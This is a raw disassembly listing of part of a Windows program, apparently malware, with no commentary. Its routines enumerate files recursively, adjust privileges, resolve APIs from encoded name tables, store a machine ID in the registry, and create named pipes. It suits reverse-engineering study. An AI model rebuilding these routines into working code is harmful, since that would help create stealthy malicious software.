lea eax, [ebp+var_250]
push eax
lea eax, [ebp+var_458]
push eax
call dword_40FE94 ; FindFirstFileW
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
jz loc_41B897
push ebx
loc_41B7F3: ; CODE XREF: sub_41B7B1+D8�j
cmp [ebp+var_224], 2Eh
jnz short loc_41B81B
cmp [ebp+var_222], 0
jz short loc_41B879
cmp [ebp+var_222], 2Eh
jnz short loc_41B81B
cmp [ebp+var_220], 0
jz short loc_41B879
loc_41B81B: ; CODE XREF: sub_41B7B1+4A�j
; sub_41B7B1+5E�j
mov ebx, [ebp+var_250]
shr ebx, 4
and bl, 1
jnz short loc_41B83D
push [ebp+arg_4]
lea eax, [ebp+var_224]
push eax
call dword_40FC9C
test eax, eax
jz short loc_41B879
loc_41B83D: ; CODE XREF: sub_41B7B1+76�j
lea eax, [ebp+var_224]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_458]
push eax
call dword_40FC8C
test bl, bl
lea eax, [ebp+var_458]
jz short loc_41B86D
push [ebp+arg_4]
push eax
call sub_41B7B1
pop ecx
pop ecx
add edi, eax
jmp short loc_41B879
; ---------------------------------------------------------------------------
loc_41B86D: ; CODE XREF: sub_41B7B1+AB�j
push eax
call sub_41B052
test al, al
pop ecx
jz short loc_41B879
inc edi
loc_41B879: ; CODE XREF: sub_41B7B1+54�j
; sub_41B7B1+68�j ...
lea eax, [ebp+var_250]
push eax
push esi
call dword_40FE98 ; FindNextFileW
test eax, eax
jnz loc_41B7F3
push esi
call dword_40FE9C ; FindClose
pop ebx
loc_41B897: ; CODE XREF: sub_41B7B1+3B�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_41B7B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B89D proc near ; CODE XREF: .data:loc_418A73�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
lea eax, [ebp+var_4]
push eax
push 28h
push dword_40FB30
call dword_40FBD0
xor ebx, ebx
test eax, eax
jz short loc_41B8F5
lea eax, [ebp+var_10]
push eax
mov eax, dword_40FB34
push dword ptr [eax+80h]
push ebx
call dword_40FBC8
test eax, eax
jz short loc_41B8F5
push ebx
push ebx
push ebx
lea eax, [ebp+var_14]
push eax
push ebx
push [ebp+var_4]
mov [ebp+var_14], 1
mov [ebp+var_8], 2
call dword_40FBCC
loc_41B8F5: ; CODE XREF: sub_41B89D+1D�j
; sub_41B89D+37�j
xor eax, eax
cmp [ebp+arg_0], bl
push ebx
setnz al
inc eax
or eax, 4
push eax
call dword_40FACC
test eax, eax
setnz al
pop ebx
leave
retn
sub_41B89D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B911 proc near ; CODE XREF: sub_41C67A+31�p
; .data:0041C6FB�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
push [ebp+arg_0]
mov esi, eax
push esi
call sub_41A1D4
test al, al
pop ecx
pop ecx
jz short loc_41B995
mov ebx, [ebp+arg_C]
and ebx, 1
xor edi, edi
loc_41B930: ; CODE XREF: sub_41B911+82�j
cmp ebx, edi
jz short loc_41B956
push edi
push edi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_40FD94 ; lstrlenA
push eax
push esi
loc_41B946: ; CODE XREF: sub_41B911+5D�j
call sub_41A221
add esp, 1Ch
test al, al
jz short loc_41B985
loc_41B952: ; CODE XREF: sub_41B911+72�j
mov eax, esi
jmp short loc_41B997
; ---------------------------------------------------------------------------
loc_41B956: ; CODE XREF: sub_41B911+21�j
test byte ptr [ebp+arg_C], 2
jz short loc_41B970
push edi
push edi
push edi
push esi
call dword_40FD94 ; lstrlenA
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_4]
jmp short loc_41B946
; ---------------------------------------------------------------------------
loc_41B970: ; CODE XREF: sub_41B911+49�j
push [ebp+arg_8]
push 0FFFFFFFFh
push [ebp+arg_4]
push esi
call sub_41A493
add esp, 10h
test eax, eax
jz short loc_41B952
loc_41B985: ; CODE XREF: sub_41B911+3F�j
push 1
push esi
call sub_41A1FA
mov esi, eax
cmp esi, edi
pop ecx
pop ecx
jnz short loc_41B930
loc_41B995: ; CODE XREF: sub_41B911+15�j
xor eax, eax
loc_41B997: ; CODE XREF: sub_41B911+43�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41B911 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B99C proc near ; CODE XREF: sub_414785+56�p
; sub_415655+30�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_4]
test esi, esi
push edi
jz short loc_41B9AB
and dword ptr [esi], 0
loc_41B9AB: ; CODE XREF: sub_41B99C+A�j
push 10h
push [ebp+arg_0]
lea eax, [ebp+arg_4]
push eax
mov eax, dword_40FB34
push esi
push 10h
push dword ptr [eax+2Ch]
call sub_41AAD0
mov edi, eax
add esp, 18h
test edi, edi
jz short loc_41B9E3
test esi, esi
jz short loc_41B9E3
mov esi, [esi]
test esi, esi
jz short loc_41B9E3
push 0
push edi
push esi
call sub_41AF95
add esp, 0Ch
loc_41B9E3: ; CODE XREF: sub_41B99C+2F�j
; sub_41B99C+33�j ...
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_41B99C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B9E9 proc near ; CODE XREF: sub_414785+116�p
; sub_41512C+AF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
lea eax, [ebx+10h]
push esi
push eax
mov [ebp+arg_8], eax
call sub_41A81F
mov esi, eax
test esi, esi
pop ecx
jnz short loc_41BA08
xor al, al
jmp short loc_41BA52
; ---------------------------------------------------------------------------
loc_41BA08: ; CODE XREF: sub_41B9E9+19�j
push edi
push 10h
push [ebp+arg_0]
push esi
call sub_41A857
push ebx
push [ebp+arg_4]
lea edi, [esi+10h]
push edi
call sub_41A857
push 0
push ebx
push edi
call sub_41AF34
push [ebp+arg_8]
mov eax, dword_40FB34
push esi
push 0
push 0
push 0Fh
push dword ptr [eax+2Ch]
call sub_41AAD0
test eax, eax
push esi
setnbe bl
call sub_41A83D
add esp, 40h
mov al, bl
pop edi
loc_41BA52: ; CODE XREF: sub_41B9E9+1D�j
pop esi
pop ebx
pop ebp
retn
sub_41B9E9 endp
; ---------------------------------------------------------------------------
dw 34A1h
dd 6A0040FBh, 2474FF10h, 6A006A08h, 0FF116A00h, 61E82C70h
dd 33FFFFF0h, 18C483C9h, 0C01BC83Bh
db 0F7h, 0D8h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_41BA7B proc near ; CODE XREF: sub_41BFC6+4�p
arg_0 = byte ptr 4
push 61h
push offset off_402A68
push offset dword_4031D0
call sub_41AECF
add esp, 0Ch
test eax, eax
mov dword_40FD30, eax
jnz short loc_41BA9B
loc_41BA98: ; CODE XREF: sub_41BA7B+3B�j
xor al, al
retn
; ---------------------------------------------------------------------------
loc_41BA9B: ; CODE XREF: sub_41BA7B+1B�j
push 1
push offset off_402D70
push offset dword_4031C0
call sub_41AECF
add esp, 0Ch
test eax, eax
mov dword_40FBA4, eax
jz short loc_41BA98
push ebx
mov bl, [esp+4+arg_0]
test bl, 8
jz short loc_41BAE3
push 7
push offset off_402D78
push offset dword_401088
call sub_41AECF
add esp, 0Ch
test eax, eax
mov dword_40FC24, eax
jz loc_41BC15
loc_41BAE3: ; CODE XREF: sub_41BA7B+45�j
push 0Dh
push offset off_402DB0
push offset dword_4031B0
call sub_41AECF
add esp, 0Ch
test eax, eax
mov dword_40FC6C, eax
jz loc_41BC15
push 1
push offset off_402E18
push offset dword_4031A4
call sub_41AECF
add esp, 0Ch
test eax, eax
mov dword_40FCA8, eax
jz loc_41BC15
test bl, 20h
jz short loc_41BB4B
push 1Ah
push offset off_402E20
push offset dword_40105C
call sub_41AECF
add esp, 0Ch
test eax, eax
mov dword_40FB38, eax
jz loc_41BC15
loc_41BB4B: ; CODE XREF: sub_41BA7B+AD�j
push 16h
push offset off_402EF0
push offset dword_403194
call sub_41AECF
add esp, 0Ch
test eax, eax
mov dword_40FBC0, eax
jz loc_41BC15
test bl, 10h
jz short loc_41BB92
push 12h
push offset off_402FA0
push offset dword_40106C
call sub_41AECF
add esp, 0Ch
test eax, eax
mov dword_40FCB8, eax
jz loc_41BC15
loc_41BB92: ; CODE XREF: sub_41BA7B+F4�j
test bl, 4
jz short loc_41BBB4
push 3
push offset off_403030
push offset dword_401078
call sub_41AECF
add esp, 0Ch
test eax, eax
mov dword_40FBB0, eax
jz short loc_41BC15
loc_41BBB4: ; CODE XREF: sub_41BA7B+11A�j
test bl, 2
jz short loc_41BBD6
push 18h
push offset off_403048
push offset dword_401050
call sub_41AECF
add esp, 0Ch
test eax, eax
mov dword_40FAC8, eax
jz short loc_41BC15
loc_41BBD6: ; CODE XREF: sub_41BA7B+13C�j
push 1
push offset off_403108
push offset aZspjudv ; "\tµ°§spjž¤¢"
call sub_41AECF
add esp, 0Ch
test eax, eax
mov dword_40FC64, eax
jz short loc_41BC15
test bl, 40h
jz short loc_41BC19
push 7
push offset off_403110
push offset dword_401040
call sub_41AECF
add esp, 0Ch
test eax, eax
mov dword_40FC44, eax
jnz short loc_41BC19
loc_41BC15: ; CODE XREF: sub_41BA7B+62�j
; sub_41BA7B+83�j ...
xor al, al
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41BC19: ; CODE XREF: sub_41BA7B+17B�j
; sub_41BA7B+198�j
mov al, 1
pop ebx
retn
sub_41BA7B endp
; =============== S U B R O U T I N E =======================================
sub_41BC1D proc near ; CODE XREF: sub_41512C+38�p
; sub_41C198+197�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
xor ebx, ebx
cmp [esp+4+arg_0], ebx
jnz short loc_41BC2A
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41BC2A: ; CODE XREF: sub_41BC1D+7�j
mov eax, [esp+4+arg_4]
cmp eax, 0FFFFFFFFh
jnz short loc_41BC3D
push [esp+4+arg_0]
call dword_40FD90 ; lstrlenW
loc_41BC3D: ; CODE XREF: sub_41BC1D+14�j
push esi
lea esi, [eax+1]
push edi
push esi
call sub_41A81F
mov edi, eax
cmp edi, ebx
pop ecx
jz short loc_41BC67
push ebx
push ebx
lea eax, [esi-1]
push eax
push edi
push eax
push [esp+20h+arg_0]
push ebx
push ebx
call dword_40FE64 ; WideCharToMultiByte
mov [edi+esi-1], bl
loc_41BC67: ; CODE XREF: sub_41BC1D+30�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_41BC1D endp
; =============== S U B R O U T I N E =======================================
sub_41BC6D proc near ; CODE XREF: sub_4176F7+D2�p
; sub_417F0B+30�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jnz short loc_41BC77
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41BC77: ; CODE XREF: sub_41BC6D+5�j
mov eax, [esp+arg_4]
cmp eax, 0FFFFFFFFh
jnz short loc_41BC8A
push [esp+arg_0]
call dword_40FD94 ; lstrlenA
loc_41BC8A: ; CODE XREF: sub_41BC6D+11�j
push esi
lea esi, [eax+1]
push edi
push esi
call sub_41A81F
mov edi, eax
test edi, edi
pop ecx
jz short loc_41BCB2
lea eax, [esi-1]
push eax
push [esp+0Ch+arg_0]
push edi
call sub_41A857
add esp, 0Ch
mov byte ptr [edi+esi-1], 0
loc_41BCB2: ; CODE XREF: sub_41BC6D+2D�j
mov eax, edi
pop edi
pop esi
retn
sub_41BC6D endp
; =============== S U B R O U T I N E =======================================
sub_41BCB7 proc near ; CODE XREF: sub_41549E+6F�p
; sub_41555A+4A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jnz short loc_41BCC1
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41BCC1: ; CODE XREF: sub_41BCB7+5�j
push ebx
push esi
push edi
mov edi, [esp+0Ch+arg_4]
cmp edi, 0FFFFFFFFh
jnz short loc_41BCD9
push [esp+0Ch+arg_0]
call dword_40FD94 ; lstrlenA
mov edi, eax
loc_41BCD9: ; CODE XREF: sub_41BCB7+14�j
lea esi, [edi+edi+2]
push esi
call sub_41A81F
mov ebx, eax
test ebx, ebx
pop ecx
jz short loc_41BD01
push edi
push ebx
push edi
push [esp+18h+arg_0]
push 0
push 0
call dword_40FE60 ; MultiByteToWideChar
and word ptr [esi+ebx-2], 0
loc_41BD01: ; CODE XREF: sub_41BCB7+31�j
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_41BCB7 endp
; =============== S U B R O U T I N E =======================================
sub_41BD07 proc near ; CODE XREF: .data:004159F0�p
; .data:0041967B�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
test edi, edi
jnz short loc_41BD14
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_41BD14: ; CODE XREF: sub_41BD07+7�j
push esi
push edi
call dword_40FD90 ; lstrlenW
inc eax
add eax, eax
push eax
call sub_41A81F
mov esi, eax
test esi, esi
pop ecx
jz short loc_41BD34
push edi
push esi
call dword_40FD98 ; lstrcpyW
loc_41BD34: ; CODE XREF: sub_41BD07+23�j
mov eax, esi
pop esi
pop edi
retn
sub_41BD07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD39 proc near ; CODE XREF: sub_41C198+1E8�p
; .data:0041D087�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push edi
mov edi, [ebp+arg_4]
mov eax, [edi]
imul eax, 3
inc eax
push eax
call sub_41A81F
pop ecx
mov ecx, eax
xor ebx, ebx
cmp ecx, ebx
mov [ebp+var_4], ecx
jnz short loc_41BD5E
xor al, al
jmp short loc_41BDD7
; ---------------------------------------------------------------------------
loc_41BD5E: ; CODE XREF: sub_41BD39+1F�j
push esi
xor esi, esi
cmp [edi], ebx
mov edi, [ebp+arg_0]
jbe short loc_41BDC2
loc_41BD68: ; CODE XREF: sub_41BD39+87�j
mov eax, [edi]
mov al, [ebx+eax]
cmp al, 20h
mov [esi+ecx], al
jnz short loc_41BD7A
mov byte ptr [esi+ecx], 2Bh
jmp short loc_41BDB9
; ---------------------------------------------------------------------------
loc_41BD7A: ; CODE XREF: sub_41BD39+39�j
cmp al, 30h
jge short loc_41BD86
cmp al, 2Dh
jz short loc_41BD86
cmp al, 2Eh
jnz short loc_41BD9E
loc_41BD86: ; CODE XREF: sub_41BD39+43�j
; sub_41BD39+47�j
cmp al, 41h
jge short loc_41BD8E
cmp al, 39h
jg short loc_41BD9E
loc_41BD8E: ; CODE XREF: sub_41BD39+4F�j
cmp al, 5Ah
jle short loc_41BD9A
cmp al, 61h
jge short loc_41BD9A
cmp al, 5Fh
jnz short loc_41BD9E
loc_41BD9A: ; CODE XREF: sub_41BD39+57�j
; sub_41BD39+5B�j
cmp al, 7Ah
jle short loc_41BDB9
loc_41BD9E: ; CODE XREF: sub_41BD39+4B�j
; sub_41BD39+53�j ...
mov byte ptr [esi+ecx], 25h
inc esi
lea eax, [esi+ecx]
push eax
mov eax, [edi]
movzx eax, byte ptr [eax+ebx]
push eax
call sub_41A7C4
pop ecx
pop ecx
mov ecx, [ebp+var_4]
inc esi
loc_41BDB9: ; CODE XREF: sub_41BD39+3F�j
; sub_41BD39+63�j
mov eax, [ebp+arg_4]
inc ebx
inc esi
cmp ebx, [eax]
jb short loc_41BD68
loc_41BDC2: ; CODE XREF: sub_41BD39+2D�j
push dword ptr [edi]
call sub_41A83D
mov eax, [ebp+var_4]
mov [edi], eax
mov eax, [ebp+arg_4]
pop ecx
mov [eax], esi
mov al, 1
pop esi
loc_41BDD7: ; CODE XREF: sub_41BD39+23�j
pop edi
pop ebx
leave
retn
sub_41BD39 endp
; =============== S U B R O U T I N E =======================================
sub_41BDDB proc near ; CODE XREF: sub_415FD3+85�p
; sub_415FD3+8B�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
push edi
call dword_40FD94 ; lstrlenA
test eax, eax
jbe short loc_41BE43
add eax, edi
cmp edi, eax
push esi
mov ecx, edi
lea esi, [eax-1]
jnb short loc_41BE27
loc_41BDF7: ; CODE XREF: sub_41BDDB+35�j
mov dl, [ecx]
cmp dl, 0Dh
jz short loc_41BE0D
cmp dl, 0Ah
jz short loc_41BE0D
cmp dl, 20h
jz short loc_41BE0D
cmp dl, 9
jnz short loc_41BE27
loc_41BE0D: ; CODE XREF: sub_41BDDB+21�j
; sub_41BDDB+26�j ...
inc ecx
cmp ecx, eax
jb short loc_41BDF7
jmp short loc_41BE27
; ---------------------------------------------------------------------------
loc_41BE14: ; CODE XREF: sub_41BDDB+4E�j
mov al, [esi]
cmp al, 0Dh
jz short loc_41BE26
cmp al, 0Ah
jz short loc_41BE26
cmp al, 20h
jz short loc_41BE26
cmp al, 9
jnz short loc_41BE2B
loc_41BE26: ; CODE XREF: sub_41BDDB+3D�j
; sub_41BDDB+41�j ...
dec esi
loc_41BE27: ; CODE XREF: sub_41BDDB+1A�j
; sub_41BDDB+30�j ...
cmp esi, ecx
ja short loc_41BE14
loc_41BE2B: ; CODE XREF: sub_41BDDB+49�j
cmp edi, ecx
jnb short loc_41BE3E
mov eax, esi
sub eax, ecx
push eax
push ecx
push edi
call sub_41A857
add esp, 0Ch
loc_41BE3E: ; CODE XREF: sub_41BDDB+52�j
mov byte ptr [esi+1], 0
pop esi
loc_41BE43: ; CODE XREF: sub_41BDDB+E�j
pop edi
retn
sub_41BDDB endp
; =============== S U B R O U T I N E =======================================
sub_41BE45 proc near ; CODE XREF: sub_415B4A+B6�p
; sub_415D04+3A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
jz short loc_41BE67
mov eax, [esp+arg_4]
add eax, 2
push eax
push [esp+4+arg_0]
push 8
push dword_40FCB4
call dword_40FDD0 ; RtlReAllocateHeap
retn
; ---------------------------------------------------------------------------
loc_41BE67: ; CODE XREF: sub_41BE45+5�j
push [esp+arg_4]
call sub_41A81F
pop ecx
retn
sub_41BE45 endp
; =============== S U B R O U T I N E =======================================
sub_41BE72 proc near ; CODE XREF: sub_416137+CA�p
; .data:00416F68�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push 0
push [esp+8+arg_0]
call sub_41A8BB
add esp, 0Ch
retn
sub_41BE72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE85 proc near ; CODE XREF: .data:00419D78�p
var_208 = byte ptr -208h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 208h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_208]
call sub_41A901
push 14h
call sub_41A81F
mov esi, eax
xor edi, edi
cmp esi, edi
pop ecx
pop ecx
jnz short loc_41BEB6
loc_41BEAF: ; CODE XREF: sub_41BE85+5E�j
xor eax, eax
jmp loc_41BF64
; ---------------------------------------------------------------------------
loc_41BEB6: ; CODE XREF: sub_41BE85+28�j
push edi
push edi
mov eax, 200h
push eax
push eax
push 0FFh
push 6
push 3
lea eax, [ebp+var_208]
push eax
call dword_40FDE4 ; CreateNamedPipeW
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_41BEE5
push esi
call sub_41A83D
loc_41BEE2: ; CODE XREF: sub_41BE85+C9�j
pop ecx
jmp short loc_41BEAF
; ---------------------------------------------------------------------------
loc_41BEE5: ; CODE XREF: sub_41BE85+55�j
push edi
push edi
push edi
push edi
call dword_40FDC4 ; CreateEventW
push edi
push edi
push edi
push edi
mov [esi+4], eax
call dword_40FDC4 ; CreateEventW
push [ebp+arg_4]
mov [esi+8], eax
mov eax, [ebp+arg_0]
mov [esi+0Ch], eax
call sub_41BD07
pop ecx
push edi
push edi
push esi
push offset sub_4093FA
push edi
push edi
mov [esi+10h], eax
call dword_40FE10 ; CreateThread
cmp eax, edi
jnz short loc_41BF50
push dword ptr [esi]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+4]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+8]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+10h]
call sub_41A83D
push esi
call sub_41A83D
pop ecx
jmp short loc_41BEE2
; ---------------------------------------------------------------------------
loc_41BF50: ; CODE XREF: sub_41BE85+9E�j
push eax
call dword_40FDAC ; CloseHandle
push 0FFFFFFFFh
push dword ptr [esi+8]
call dword_40FDB8 ; WaitForSingleObject
mov eax, esi
loc_41BF64: ; CODE XREF: sub_41BE85+2C�j
pop edi
pop esi
leave
retn
sub_41BE85 endp
; =============== S U B R O U T I N E =======================================
sub_41BF68 proc near ; CODE XREF: .data:00419E0C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
push edi
xor edi, edi
cmp esi, edi
jz short loc_41BFC3
push dword ptr [esi+4]
call dword_40FDBC ; SetEvent
push edi
push edi
push edi
push edi
push edi
push [esp+1Ch+arg_0]
call sub_41AAD0
add esp, 18h
push 0FFFFFFFFh
push dword ptr [esi+8]
call dword_40FDB8 ; WaitForSingleObject
push dword ptr [esi]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+4]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+8]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+10h]
call sub_41A83D
push esi
call sub_41A83D
pop ecx
pop ecx
loc_41BFC3: ; CODE XREF: sub_41BF68+A�j
pop edi
pop esi
retn
sub_41BF68 endp
; =============== S U B R O U T I N E =======================================
sub_41BFC6 proc near ; CODE XREF: sub_41BFFA+14�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41BA7B
test al, al
pop ecx
jnz short loc_41BFD5
retn
; ---------------------------------------------------------------------------
loc_41BFD5: ; CODE XREF: sub_41BFC6+C�j
call dword_40FD60 ; GetProcessHeap
or dword_40FB30, 0FFFFFFFFh
push offset sub_4099A9
mov dword_40FCB4, eax
call sub_41B32E
mov dword_40FCB0, eax
pop ecx
mov al, 1
retn
sub_41BFC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BFFA proc near ; CODE XREF: .data:00415798�p
; .data:004166F8�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
push [ebp+arg_0]
xor ebx, ebx
mov dword_40FC20, ebx
call sub_41BFC6
test al, al
pop ecx
jz short loc_41C090
push 1BCh
call sub_41A81F
cmp eax, ebx
pop ecx
mov dword_40FB34, eax
jz short loc_41C090
mov [ebp+var_4], ebx
loc_41C02F: ; CODE XREF: sub_41BFFA+AE�j
movzx esi, word ptr [ebp+var_4]
shl esi, 2
mov eax, off_40F408[esi]
movzx eax, byte ptr [eax]
inc eax
push eax
call sub_41A81F
mov edi, eax
cmp edi, ebx
pop ecx
jz short loc_41C090
push edi
push off_40F408[esi]
call sub_41AE95
cmp byte ptr [edi], 57h
pop ecx
pop ecx
jnz short loc_41C097
mov eax, off_40F408[esi]
movzx eax, byte ptr [eax]
dec eax
push eax
lea eax, [edi+1]
push eax
call sub_41BCB7
mov ecx, dword_40FB34
push edi
mov [esi+ecx], eax
call sub_41A83D
mov eax, dword_40FB34
add esp, 0Ch
cmp [esi+eax], ebx
jnz short loc_41C0A0
loc_41C090: ; CODE XREF: sub_41BFFA+1C�j
; sub_41BFFA+30�j ...
xor al, al
loc_41C092: ; CODE XREF: sub_41BFFA+199�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41C097: ; CODE XREF: sub_41BFFA+64�j
mov eax, dword_40FB34
inc edi
mov [esi+eax], edi
loc_41C0A0: ; CODE XREF: sub_41BFFA+94�j
inc [ebp+var_4]
cmp word ptr [ebp+var_4], 6Fh
jb short loc_41C02F
call dword_40FE44 ; GetCurrentProcessId
test byte ptr [ebp+arg_0], 1
mov dword_40FCA4, eax
mov eax, dword_40FCB0
mov dword_40FC1C, eax
jz short loc_41C0E4
mov eax, dword_40FB34
push dword ptr [eax+78h]
push dword_40FD30
call dword_40FD04 ; GetProcAddress
cmp eax, ebx
jz short loc_41C0E4
push 8007h
call eax ; dword_40FB34
loc_41C0E4: ; CODE XREF: sub_41BFFA+C9�j
; sub_41BFFA+E1�j
xor edi, edi
inc edi
push edi
mov esi, offset dword_40FD0C
push esi
call dword_40FBF4
push ebx
push ebx
push edi
push esi
call dword_40FBF8
lea eax, [ebp+var_C]
push eax
push 28h
push dword_40FB30
mov dword_40FD24, 0Ch
mov dword_40FD28, esi
mov dword_40FD2C, ebx
call dword_40FBD0
test eax, eax
jz short loc_41C185
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FB34
push dword ptr [eax+7Ch]
push ebx
call dword_40FBC8
test eax, eax
jz short loc_41C17C
mov eax, [ebp+var_8]
push ebx
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
push ebx
push 10h
mov [ebp+var_14], eax
lea eax, [ebp+var_1C]
push eax
push ebx
push [ebp+var_C]
mov [ebp+var_1C], edi
mov [ebp+var_10], 2
call dword_40FBCC
call dword_40FD78 ; RtlGetLastWin32Error
cmp eax, 514h
jnz short loc_41C17C
or dword_40FC20, edi
loc_41C17C: ; CODE XREF: sub_41BFFA+145�j
; sub_41BFFA+17A�j
push [ebp+var_C]
call dword_40FDAC ; CloseHandle
loc_41C185: ; CODE XREF: sub_41BFFA+12E�j
call dword_40FD5C ; GetUserDefaultUILanguage
mov word_40FBAC, ax
mov al, 1
jmp loc_41C092
sub_41BFFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C198 proc near ; CODE XREF: .data:004157E1�p
; .data:00419D4B�p
var_27C = byte ptr -27Ch
var_74 = byte ptr -74h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 27Ch
mov eax, dword_40FC20
and al, 1
neg al
push ebx
push esi
push edi
push 208h
mov [ebp+var_4], 206h
sbb eax, eax
add eax, 80000002h
mov [ebp+var_C], eax
lea eax, [ebp+var_27C]
push eax
call sub_41BE72
mov edi, [ebp+arg_0]
pop ecx
xor ebx, ebx
cmp edi, 0FFFFFFFFh
pop ecx
jz loc_41C27E
cmp edi, ebx
jz short loc_41C214
cmp [edi], bx
jz short loc_41C214
push edi
call dword_40FD90 ; lstrlenW
mov esi, eax
add esi, esi
mov eax, 204h
cmp esi, eax
jnb short loc_41C1FE
mov eax, esi
loc_41C1FE: ; CODE XREF: sub_41C198+62�j
push eax
lea eax, [ebp+var_27C]
push edi
push eax
call sub_41A857
add esp, 0Ch
jmp loc_41C2D2
; ---------------------------------------------------------------------------
loc_41C214: ; CODE XREF: sub_41C198+49�j
; sub_41C198+4E�j
push ebx
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FB34
push ebx
push 1
push ebx
push ebx
push ebx
push dword ptr [eax+40h]
push [ebp+var_C]
call dword_40FBE0
test eax, eax
jnz short loc_41C27E
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_27C]
push eax
lea eax, [ebp+var_10]
push eax
mov eax, dword_40FB34
push ebx
push dword ptr [eax+44h]
push [ebp+var_8]
call dword_40FBDC
test eax, eax
jnz short loc_41C269
cmp [ebp+var_10], 1
jnz short loc_41C269
cmp [ebp+var_4], 4
mov byte ptr [ebp+arg_0+3], 1
ja short loc_41C26C
loc_41C269: ; CODE XREF: sub_41C198+BF�j
; sub_41C198+C5�j
mov byte ptr [ebp+arg_0+3], bl
loc_41C26C: ; CODE XREF: sub_41C198+CF�j
push [ebp+var_8]
call dword_40FBE4
cmp byte ptr [ebp+arg_0+3], bl
jnz loc_41C31E
loc_41C27E: ; CODE XREF: sub_41C198+41�j
; sub_41C198+9A�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_74]
push eax
mov [ebp+var_4], 31h
call dword_40FEA0 ; GetComputerNameW
test eax, eax
jnz short loc_41C2A6
push offset aUnknown ; "unknown"
lea eax, [ebp+var_74]
push eax
call dword_40FD98 ; lstrcpyW
loc_41C2A6: ; CODE XREF: sub_41C198+FD�j
call dword_40FDE8 ; GetTickCount
push eax
lea eax, [ebp+var_74]
push eax
mov eax, dword_40FB34
push dword ptr [eax+64h]
lea eax, [ebp+var_27C]
push 103h
push eax
call dword_40FC84
mov esi, eax
add esp, 14h
add esi, esi
loc_41C2D2: ; CODE XREF: sub_41C198+77�j
push ebx
lea eax, [ebp+var_8]
push eax
mov eax, dword_40FB34
push ebx
push 2
push ebx
push ebx
inc esi
push ebx
inc esi
mov [ebp+var_4], esi
push dword ptr [eax+40h]
push [ebp+var_C]
call dword_40FBE0
test eax, eax
jnz short loc_41C31E
push [ebp+var_4]
lea eax, [ebp+var_27C]
push eax
mov eax, dword_40FB34
push 1
push ebx
push dword ptr [eax+44h]
push [ebp+var_8]
call dword_40FBE8
push [ebp+var_8]
call dword_40FBE4
loc_41C31E: ; CODE XREF: sub_41C198+E0�j
